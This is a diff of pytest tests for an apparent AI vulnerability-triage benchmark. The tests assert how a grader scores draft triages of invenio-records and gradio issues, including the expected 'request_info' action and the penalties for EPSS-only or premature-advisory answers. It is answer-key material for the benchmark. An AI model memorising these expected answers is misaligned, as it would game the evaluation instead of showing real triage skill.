+def test_medium_task_exploitability_costs_points_if_epss_only():
+    """A model that reads only EPSS and submits 'low' exploitability loses points."""
+    draft = TriageDraft(
+        validity="valid",
+        affected_package="invenio-records",
+        affected_versions="<1.0.2 ; >=1.1.0,<1.1.1 ; >=1.2.0,<1.2.2",
+        severity="medium",
+        exploitability="low",   # wrong — EPSS-only answer
+        next_action="publish_advisory",
+    )
+    breakdown = grade_task("task_medium_invenio", draft)
+    assert breakdown["exploitability"] == 0.0
+    assert breakdown["total"] < 1.0
+# ---------------------------------------------------------------------------
+# Difficulty redesign — Hard task
+# ---------------------------------------------------------------------------
+def test_hard_task_correct_next_action_is_request_info():
+    """Hard task must require request_info, not publish_advisory."""
+    truth = CASE_DEFINITIONS["task_hard_gradio"].truth
+    assert truth.next_action == "request_info", (
+        "Hard task next_action must be 'request_info' — no patch exists yet."
+    )
+def test_hard_task_has_vendor_status_evidence():
+    """Hard task should inject a vendor_status evidence item explaining no patch."""
+    evidence_ids = [e["evidence_id"] for e in CASE_DEFINITIONS["task_hard_gradio"].evidence]
+    assert "vendor_status" in evidence_ids
+def test_hard_task_affected_versions_covers_all():
+    """Hard task affected_versions must be >=0 (no fixed version)."""
+    truth = CASE_DEFINITIONS["task_hard_gradio"].truth
+    assert truth.affected_versions == ">=0"
+def test_hard_task_publish_advisory_costs_next_action_points():
+    """A model that naively publishes instead of requesting info loses 15%."""
+    truth = CASE_DEFINITIONS["task_hard_gradio"].truth
+    draft = TriageDraft(
+        validity="valid",
+        affected_package="gradio",
+        affected_versions=">=0",
+        severity="medium",
+        exploitability="low",
+        next_action="publish_advisory",   # wrong — no patch exists
+        missing_information=list(truth.missing_information),
+    )
+    breakdown = grade_task("task_hard_gradio", draft)
+    assert breakdown["next_action"] == 0.0
+    assert breakdown["total"] < 1.0
+def test_hard_task_request_info_scores_full():
+    """The correct hard-task answer should score 1.0."""
+    truth = CASE_DEFINITIONS["task_hard_gradio"].truth
+    draft = TriageDraft(
+        validity=truth.validity,
+        affected_package=truth.affected_package,
+        affected_versions=truth.affected_versions,
+        severity=truth.severity,
+        exploitability=truth.exploitability,
+        next_action="request_info",
+        missing_information=list(truth.missing_information),
+    )
+    breakdown = grade_task("task_hard_gradio", draft)
+    assert breakdown["next_action"] == 1.0
+    assert breakdown["total"] == 1.0
+def test_hard_task_has_non_empty_missing_information():
+    truth = CASE_DEFINITIONS["task_hard_gradio"].truth
+    assert len(truth.missing_information) >= 3
+def test_hard_task_empty_missing_info_costs_points():
+    draft = TriageDraft(
+        validity="valid",
+        affected_package="gradio",
+        affected_versions=">=0",
+        severity="medium",
+        exploitability="low",
+        next_action="request_info",
+        missing_information=[],
+    )
+    breakdown = grade_task("task_hard_gradio", draft)
+    assert breakdown["missing_information"] == 0.0
+    assert breakdown["total"] < 1.0

uv.lock ADDED Viewed

The diff for this file is too large to render. See raw diff